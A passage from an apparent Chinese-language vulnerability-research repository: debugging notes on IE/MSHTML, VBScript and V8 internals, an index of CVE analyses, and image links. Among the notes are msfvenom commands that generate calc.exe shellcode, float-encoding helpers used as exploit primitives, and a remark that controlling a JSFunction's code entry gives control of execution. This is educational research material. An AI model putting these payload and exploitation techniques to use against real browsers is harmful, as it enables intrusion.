 75 | (6b1b497b)   MSHTML!CHeadElement::CreateElement   |  (6b1b4a40)   MSHTML!CHeadElement::`vftable'
 76 | Exact matches:
 77 |     MSHTML!CHeadElement::CreateElement = <no type information>
 78 | Element Address: 0bd2bfc8
 79 | eax=00000000 ebx=0bd14d60 ecx=00000036 edx=6af96e25 esi=0bd14d60 edi=0bd14cf8
 80 | eip=6b032b29 esp=04acc0d8 ebp=04acc0f0 iopl=0         nv up ei pl zr na pe nc
 81 | cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 82 | MSHTML!CHtml5TreeConstructor::InsertAnHTMLElement+0x48:
 83 | 6b032b29 8b75fc          mov     esi,dword ptr [ebp-4] ss:0023:04acc0ec=0bd2bfc8
 84 | 0:007> g
 85 | (6b1b423d)   MSHTML!CBodyElement::CreateElement   |  (6b1b4320)   MSHTML!CBodyElement::`vftable'
 86 | Exact matches:
 87 |     MSHTML!CBodyElement::CreateElement = <no type information>
 88 | Element Address: 0bd2ffc0
 89 | eax=00000000 ebx=0bb33f28 ecx=00000012 edx=6af96e25 esi=0bd14da8 edi=0bd14cf8
 90 | eip=6b032b29 esp=04acc1a8 ebp=04acc1c0 iopl=0         nv up ei pl zr na pe nc
 91 | cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 92 | MSHTML!CHtml5TreeConstructor::InsertAnHTMLElement+0x48:
 93 | 6b032b29 8b75fc          mov     esi,dword ptr [ebp-4] ss:0023:04acc1bc=0bd2ffc0
 94 | 0:007> g
 95 | (6b1dcc3d)   MSHTML!CScriptElement::CreateElement   |  (6b1dccb0)   MSHTML!CScriptElement::`vftable'
 96 | Exact matches:
 97 |     MSHTML!CScriptElement::CreateElement = <no type information>
 98 | Element Address: 0bd35f40
 99 | eax=00000000 ebx=0bb33f50 ecx=00000065 edx=6af96e25 esi=0bd14d78 edi=0bd14cf8
100 | eip=6b032b29 esp=04acc158 ebp=04acc170 iopl=0         nv up ei pl zr na pe nc
101 | cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
102 | MSHTML!CHtml5TreeConstructor::InsertAnHTMLElement+0x48:
103 | 6b032b29 8b75fc          mov     esi,dword ptr [ebp-4] ss:0023:04acc16c=0bd35f40
104 | 
105 | ```
106 | 
107 | CXXXElement
108 | 
109 | ![](README/InternetExplorer0.png)
110 | 
111 | CTreeNode和CTreePos
112 | 
113 | CTreePos在逻辑上代表着一个 Element 对应的 tag 的头标签和尾标签, DOM 流即是这些 CTreePos 对象链接而成的双向链表。
114 | 
115 | ![](README/InternetExplorer1.png)
116 | 
117 | 
118 | # VBScript
119 | ## VarType
120 | |Constant|Value|Description|
121 | | :------: | :------: | :------: |
122 | |vbEmpty|0|Empty (uninitialized)|
123 | |vbNull|1|Null (no valid data)|
124 | |vbInteger|2|Integer|
125 | |vbLong|3|Long integer|
126 | |vbSingle|4|Single-precision floating-point number|
127 | |vbDouble|5|Double-precision floating-point number|
128 | |vbCurrency|6|Currency value|
129 | |vbDate|7|Date value|
130 | |vbString|8|String|
131 | |vbObject|9|Object|
132 | |vbError |10|Error value|
133 | |vbBoolean|11|Boolean value|
134 | |vbVariant|12|Variant (used only with arrays of variants)|
135 | |vbDataObject|13|A data access object|
136 | |vbDecimal|14|Decimal value|
137 | |vbByte|17|Byte value|
138 | |vbUserDefinedType|36|Variants that contain user-defined types|
139 | |VT_FUNC|76（0x4c）|
140 | |vbArray|0x2000|Array|
141 | |VT_BYREF|0x4000|
142 | |VT_RESERVED|0x8000|
143 | 
144 | 
145 | ## VBScriptClass
146 | ```
147 | <script LANGUAGE="VBScript">
148 | Dim X
149 | Class TestClass
150 |     Dim a,b
151 |     
152 |     Private Sub Class_Initialize   
153 |         a=&h1122334
154 |         b="test string"
155 |     End Sub
156 |     Private Sub Class_Terminate   
157 |     End Sub
158 |     
159 |     Sub test_fun
160 |         test_fun=1
161 |     End Sub
162 |     
163 | End Class
164 | Set X = New TestClass
165 | IsEmpty(X)
166 | 
167 | </script>
168 | ```
169 | 
170 | ![](README/VbscriptBasics0.png)
171 | 
172 | 调试过程如下：
173 | 
174 | ![](README/VbscriptBasics2.png)
175 | ![](README/VbscriptBasics3.png)
176 | ![](README/VbscriptBasics4.png)
177 | 
178 | 
179 | # Adobe Flash
180 | 
181 | ![](README/InternetExplorer4.png)
182 | 
183 | ![](README/InternetExplorer2.png)
184 | 
185 | 
186 | # V8
187 | 
188 | ## 速查
189 | 1. D8 参数
190 | * https://github.com/hilongjw/v8-RuntimeFunctions-list
191 | * https://github.com/v8/v8/blob/master/src/runtime/runtime.h
192 | * https://gist.github.com/kevincennis/0cd2138c78a07412ef21 (D8用法)
193 | 
194 | ```
195 | --allow-natives-syntax
196 | 
197 | --trace-opt 
198 | --trace-deopt
199 | --trace-opt-verbose
200 | 
201 | --code-comments
202 | --print-opt-code
203 | --print_unopt_code
204 | --trace-elements-transitions
205 | 
206 | %DebugPrint 
207 | %OptimizeFunctionOnNextCall
208 | 
209 | ```
210 | 
211 | 2. 断点
212 | ```
213 | // %DebugPrint 可以打印出变量信息，包括地址、结构； 
214 | // bu v8_libbase!v8::base::ieee754::atan    下断点，可以停下来
215 | // bu v8_libbase!v8::base::ieee754::sin     似乎sin比atan稳定
216 | var a = [0xdeadbee, 0xdeadbee, 0xdeadbee];
217 | %DebugPrint(a);
218 | Math.atan(1);
219 | Math.sin(1);
220 | 
221 | ```
222 | 3. Build V8
223 |  * https://medium.com/dailyjs/how-to-build-v8-on-windows-and-not-go-mad-6347c69aacd4
224 |  * http://eternalsakura13.com/2018/06/26/v8_environment/
225 |  * http://blog.gclxry.com/use-depot_tools-to-manage-chromium-source/ (介绍depot_tools)
226 | 
227 | ```
228 | cd ~/v8/v8
229 | git reset --hard a7a350012c05f644f3f373fb48d7ac72f7f60542
230 | gclient sync
231 | tools/dev/v8gen.py x64.debug 
232 | ninja -C out.gn/x64.debug 
233 | ```
234 | *** print-opt-code之类的，release版本D8 shell是不支持的 ***
235 | 
236 | *** print-bytecode也得在支持Ignition的V8里使用啊，之前都不生成bytecode啊。。。似乎Chrome59才支持的 *** 
237 | 
238 | 4. [What Version of V8 My Chromium Browser Is Using ?](http://erossignon.github.io/blog/2014/08/22/how-to-find-the-version-of-the-v8-my-chromium-browser-is-using/)
239 | 
240 | ```
241 | chrome://version/
242 | http://src.chromium.org/viewvc/chrome/releases/
243 | ```
244 | 
245 | 5. Metasploit 生成payload
246 | ```
247 | msfvenom -p windows/exec cmd=calc.exe  -fc
248 | msfvenom -p windows/x64/exec cmd=calc.exe  -fc
249 | ```
250 | 
251 | 
252 | 
253 | 
254 | 
255 | ## 工具函数
256 | 
257 | ```
258 | // arraybuffer to string
259 | function ab2str(buf) {
260 |   return String.fromCharCode.apply(null, new Uint16Array(buf));
261 | }
262 | 
263 | // string to arraybuffer
264 | function str2ab(str) {
265 |   var buf = new ArrayBuffer(str.length); // 1 bytes for each char
266 |   var bufView = new Uint8Array(buf);
267 |   for (var i=0, strLen=str.length; i<strLen; i++) {
268 |     bufView[i] = str.charCodeAt(i);
269 |   }
270 |   return buf;
271 | }
272 | 
273 | // 内存中的双字节表示 -> 实际值
274 | function decode_from_float64(num){
275 |     num1 = num/0x100000000;
276 |     num2 = num&0xffffffff;
277 |     d = new Uint32Array(2);
278 |     d[0] = num2;
279 |     d[1] = num1;
280 |     f = new Float64Array(d.buffer);
281 |     return f[0];
282 | }
283 | 
284 | // 实际值 -> 内存中双字节表示
285 | function encode_to_float64(num){
286 |     f = new Float64Array(1);
287 |     f[0] = num;
288 |     d = new Uint32Array(f.buffer);
289 |     return d[1] * 0x100000000 + d[0];
290 | }
291 | 
292 | ```
293 | 
294 | 
295 | ## Object 内存布局
296 | 参考：
297 | http://eternalsakura13.com/2018/05/06/v8/
298 | 
299 | ```
300 | <html>
301 | <script>
302 |     var a = [0xdeadbee, 0xdeadbeef, 4.231256, "testtesttestcy", true, false, null, undefined]
303 |     alert("1111");
304 | </script>
305 | </html>
306 | 
307 | ```
308 | 1. Small Int
309 | 64位： [0x0, 0x7fffffff]
310 | ![](README/V80.png)
311 | ![](README/V81.png)
312 | 
313 | 2. HeapNumber (超过Small Int范围的Int、Double)
314 | 首先，数组中存放的是HeapObject指针
315 | 
316 | ![](README/V82.png)
317 | 
318 | HeapNumber结构
319 | ![](README/V83.png)
320 | 
321 | 调试如下：
322 | ![](README/V84.png)
323 | 
324 | ![](README/V85.png)
325 | 
326 | 3. PropertyCell
327 | 不知道是啥，先记着
328 | 
329 | ![](README/V86.png)
330 | 
331 | 4. String
332 | ![](README/V87.png)
333 | 
334 | ![](README/V88.png)
335 | 
336 | 5. Oddball
337 | 没调出来。。。
338 | 
339 | 表示特殊值的对象，例如true，false，undefined, null
340 | 
341 | ![](README/V89.png)
342 | 
343 | 6. JSObject
344 | 
345 | 没调出来
346 | 
347 | ![](README/V810.png)
348 | 
349 | 7. JSFunction
350 | 如果能控制CodeEntry，则控制了EIP
351 | 
352 | ![](README/V811.png)
353 | 
354 | 
355 | 8. JSArray
356 | ![](README/V812.png)
357 | ![](README/V813.png)
358 | 
359 | 
360 | 9. JSArrayBuffer
361 | ![](README/V816.png)
362 | 
363 | ![](README/V815.png)
364 | 
365 | ![](README/V814.png)
366 | 
367 | 
368 | 10 Map 
369 | ```
370 | map{        //  大小 0x2c(X86)
371 |     +0x00   map
372 |     +0x04   istance_size    // byte
373 |     +0x05   InObjectProperties_or_ConstructorFunctionIndex      //byte
374 |     +0x06   unused
375 |     +0x07   visitorId       //byte
376 |     +0x08   instance_type   //byte
377 |     +0x09   bit_field       //byte
378 |     +0x0a   bit_field2      //byte
379 |     +0x0b   unused
380 |     +0x0c   bit_field3      //byte
381 |     +0x10   prototype   
382 |     +0x14   constructor 
383 |     +0x18   transitor_or_protytypeInfo
384 |     +0x1c   discriptor
385 |     +0x20   CodeCache
386 |     +0x24   DependentCode
387 |     +0x28   WeakCellCache
388 | }
389 | ```
390 | 
391 | 
392 | ## Assembly code
393 | 
394 | ```
395 | var array = [1.1];
396 | 
397 | function f() {
398 |     %DebugPrint(array);  //调试函数
399 |     Math.sin(1);   // 调试函数
400 |     array[0] = 6.176516726456e-312;
401 | }
402 | 
403 | f();
404 | %OptimizeFunctionOnNextCall(f);
405 | f();
406 | 
407 | >> d8.exe --allow-natives-syntax --code_comments --print_opt_code --print_unopt_code test.js
408 | ```
409 | 
410 | ![](README/V828.png)
411 | 
412 | 优化版本：
413 | 
414 | ![](README/V829.png)
415 | 
416 | # 汇编
417 | 
418 | ## CMP与test:
419 |    
420 |     test逻辑与运算结果为零,就把ZF(零标志)置1
421 | 
422 |     cmp 算术减法运算结果为零,就把ZF(零标志)置1
423 | 
424 | ## 汇编跳转指令
425 | 
426 | 标志名|标志 1|标志 0
427 | :------: | :------: | :------:
428 | OF (溢出标志) | OV | NV
429 | DF (方向标志) | UP | DN
430 | IF (中断标志)|DI| EI
431 | SF (符号标志位)|PL| NG
432 | ZF (零标志)|NZ| ZR
433 | AF (辅助进位标志位)|NA| AC
434 | PF (奇偶标志)|PO|PE
435 | CF (进位标志)|NC|CY
436 | 
437 | ![](README/Basics0.png)
438 | ![](README/Basics1.png)
439 | ![](README/Basics2.png)
440 | 
441 | ## [x86环境下SHORT Relative Jumps](https://thestarman.pcministry.com/asm/2bytejumps.htm)
442 | The first byte of a SHORT Jump is always EB
443 | 
444 | The second is a relative offset from 00h to 7Fh for Forward jumps, and from 
445 | 80h to FFh for Reverse (or Backward) jumps.
446 | 
447 | ![](README/Basics5.png)
448 | 
449 | ![](README/Basics6.png)
450 | 
451 | ## 寄存器
452 | https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/r--registers-
453 | ```
454 | 0:000> r xmm0:16ub
455 | 0:000> r xmm1:d
456 | 0:000> rX  (Displays the SSE XMM registers)
457 | 0:000> rF  (Displays the floating-point registers.)
458 | 
459 | 01004af3 8bec            mov     ebp,esp
460 | 0:000> r.
461 | ebp=0006ffc0  esp=0006ff7c
462 | ```
463 | ![](README/Basics4.png)
464 | ![](README/Basics3.png)


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics0.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics1.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics2.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics3.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics4.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics5.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/Basics6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/Basics6.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/InternetExplorer0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/InternetExplorer0.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/InternetExplorer1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/InternetExplorer1.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/InternetExplorer2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/InternetExplorer2.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/InternetExplorer4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/InternetExplorer4.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V80.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V80.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V81.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V81.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V810.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V810.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V811.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V811.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V812.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V812.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V813.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V813.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V814.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V814.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V815.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V815.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V816.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V816.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V817.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V817.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V818.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V818.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V819.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V819.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V82.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V82.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V820.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V820.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V821.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V821.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V822.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V822.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V823.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V823.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V824.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V824.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V825.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V825.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V826.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V826.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V827.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V827.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V828.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V828.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V829.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V829.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V83.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V83.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V84.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V84.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V85.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V85.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V86.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V86.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V87.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V87.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V88.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V88.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/V89.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/V89.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/VbscriptBasics0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/VbscriptBasics0.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/VbscriptBasics2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/VbscriptBasics2.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/VbscriptBasics3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/VbscriptBasics3.png


--------------------------------------------------------------------------------
/BrowserSecurity/README/VbscriptBasics4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/README/VbscriptBasics4.png


--------------------------------------------------------------------------------
/BrowserSecurity/V8.md:
--------------------------------------------------------------------------------
  1 | # Learning V8
  2 | ## Workflow
  3 | 
  4 | 1. https://speakerdeck.com/brn/source-to-binary-journey-of-v8-javascript-engine-english-version 
  5 | 2. http://eternalsakura13.com/2018/06/16/nodefest_v8/
  6 | 3. [How JavaScript works系列@zlatkov](https://blog.sessionstack.com/@zlatkov)
  7 | 
  8 | ```
  9 | The Engine consists of two main components:
 10 | * Memory Heap — this is where the memory allocation happens
 11 | * Call Stack — this is where your stack frames are as your code executes
 12 | ```
 13 | ![](README/V821.png)
 14 | 
 15 | 
 16 | 
 17 | V8内部是多线程的:
 18 | 
 19 | 1. 主线程
 20 |     编译执行JavaScript
 21 | 
 22 | 2. 一个单独的线程用于编译，当优化代码时，主线程也能继续执行
 23 | 
 24 | 3. 分析线程
 25 |     
 26 |     分析哪个函数耗时，需要被优化
 27 | 
 28 | 4. 垃圾回收线程
 29 | 
 30 | 
 31 | 
 32 | 
 33 | ## Object Representation
 34 | 1. https://v8.dev/blog/fast-properties
 35 | 2. http://www.jayconrod.com/posts/52/a-tour-of-v8--object-representation
 36 | 
 37 | ### Object表示
 38 | 对象内存结构一般如下图所示
 39 | 
 40 | ![](README/V818.png)
 41 | 
 42 | 对应下图
 43 | 
 44 | ![](README/V819.png)
 45 | 
 46 | 当有过多增加、删除属性的操作时，维护Hidden Class的成本很高；对象属性的存储方式退化到字典模式
 47 | 
 48 | ![](README/V820.png)
 49 | 
 50 | ### Hidden Class
 51 | 当增加一个新的属性时，Old Hidden Class会增加一个到New Hidden Class的transition path，New Hidden Class会增加一个FIELD描述，描述新增加属性的相对偏移。transition 描述符使得那些以相同方式创建的object能够共享hidden class。
 52 | 
 53 | ![](README/V823.png)
 54 | 
 55 | 不同的创建顺序，意味着不同的transition path, 从而p1,p2的hidden class不同。 建议以相同顺序初始化object，使得它们能共用hidden class；也能做inline caching，提供性能。
 56 | 
 57 | ![](README/V824.png)
 58 | 
 59 | ### Elements
 60 | https://v8.dev/blog/elements-kinds
 61 | 
 62 | 我们将属性名为非负整数（0、1、2……）的属性称为Element。V8中，Element的存放和其他属性是分开的。每个对象都有一个指向Element数组的指针，对象Map中的Element Field将反映出Element是如何存储的, 常见的Elements Kind及其变化如下所示：
 63 | 
 64 | 变化过程是不可逆的，且越往下/后变化，操作耗费越大
 65 | 
 66 | 如果你在远远超过当前数组大小的下标赋值，V8会将数组转换为字典模式，将值以哈希表的形式存储。
 67 | 
 68 | ```
 69 | const array = [1, 2, 3];
 70 | // elements kind: PACKED_SMI_ELEMENTS
 71 | array.push(4.56);
 72 | // elements kind: PACKED_DOUBLE_ELEMENTS
 73 | array.push('x');
 74 | // elements kind: PACKED_ELEMENTS
 75 | 
 76 | array.length; // 5
 77 | array[9] = 1; // array[5] until array[8] are now holes
 78 | // elements kind: HOLEY_ELEMENTS
 79 | ```
 80 | 
 81 | ![](README/V827.png)
 82 | 
 83 | ## Optimization
 84 | 1. https://juejin.im/post/59f95af951882574d1723e70#heading-8 
 85 | 
 86 | 在V8 5.9之前，V8有两个编译器：
 87 | 
 88 | 1. baseline编译器， full-codegen
 89 |    将解析过的JavaScript(AST)直接翻译成机器码（machine code）, 此时的machine code还有很多冗余，执行速度相对较慢
 90 | 
 91 | 2. 优化编译器，Crankshaft
 92 |    优化是一个单独的线程，AST -> Hydrogen graph -> optimize Hydrogen graph -> Lithium -> optimized machine code
 93 | 
 94 | 
 95 | ![](README/V822.png)
 96 | 
 97 | 
 98 | V8优化机制
 99 | 
100 | 1. Inlining
101 | 
102 | 预先内联尽可能多的代码，用函数主题替换函数调用
103 | 
104 | 2. Hidden class
105 | 
106 | 以字典模式(hash 模式)存储、访问对象非常耗时，V8使用hidden class
107 | 每个property的值都以数组的形式进行管理, 通过偏移值访问数组里的property值
108 | 
109 | 3. Inline caching
110 | 
111 | 基于假设：对同一个函数的多次调用发生在同一类object上
112 | 
113 | 当同一个hidden class上发生两次相同函数调用时，V8略去了hidden class的查找，而是使用上次查找到的偏移
114 | 
115 | 4. Compilation to machine code
116 | 
117 | 这段可能理解地不太对。。。。
118 | 
119 | 对于耗时的函数，Crankshaft会生成优化机器码。优化是在独立的线程做的，V8会转换当前执行的上下文，在执行慢代码的过程中切换到优化后版本，这个过程称之为OSR: on-stack replacement。
120 | 
121 | 5. Garbage collection
122 | 
123 | 标记清除方法
124 | 
125 | 标记过程会终止JavaScript执行，为了控制GC成本和JavaScript的执行稳定，V8使用增量标记清除。
126 | 
127 | 它不会遍历整个堆，而是遍历一部分后恢复执行，下次从上次遍历终止处继续开始。
128 | 
129 | ![](README/V826.png)
130 | 
131 | ** Ignition and TurboFan **
132 | 
133 | 引入生成中间语言(bytecode)的Ignition和优化编译器TurboFan，显著地提升了性能、节省了内存使用
134 | 
135 | ![](README/V825.png)
136 | 
137 | How to write better JavaScript？
138 | 
139 | 1. 对象属性初始化顺序一致
140 | 
141 | 2. 在构造函数时初始化好对象，避免属性的动态添加，增加维护hidden class的成本
142 | 
143 | 3. 多次重复调用一个函数
144 | 
145 | 4. 避免稀疏数组，稀疏数组其实是一个hash表，获取元素代价较高
146 | 
147 | 5. 多使用SMI数值，非SMI数值，V8需要将它转成double表示，并生成一个新的object来存储它。   
148 | 
149 | 
150 | 
151 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Vulnerability Analysis And Exploit
 2 | 
 3 |     
 4 | ## 浏览器及插件漏洞调试
 5 |  
 6 | [Browser 调试速查](BrowserSecurity/README.md)
 7 | 
 8 | [[IE][CVE-2018-8174分析] UAF](BrowserSecurity/CVE-2018-8174.md)
 9 | 
10 | [[IE][CVE-2014-6332分析] 整数溢出](BrowserSecurity/CVE-2014-6332.md)
11 | 
12 | [[IE][CVE-2016-0189分析] UAF](BrowserSecurity/CVE-2016-0189.md)
13 | 
14 | [[IE][CVE-2014-0322分析] UAF](BrowserSecurity/CVE-2014-0322.md)
15 | 
16 | [[Chrome][CVE-2016-5197分析] OOB](BrowserSecurity/CVE-2016-5197.md)
17 | 
18 | [[Chrome][CVE-2017-5070分析] Type Confustion](BrowserSecurity/CVE-2017-5070.md)
19 |     
20 | 
21 | ## Tutorials
22 | 
23 | ### Learning V8
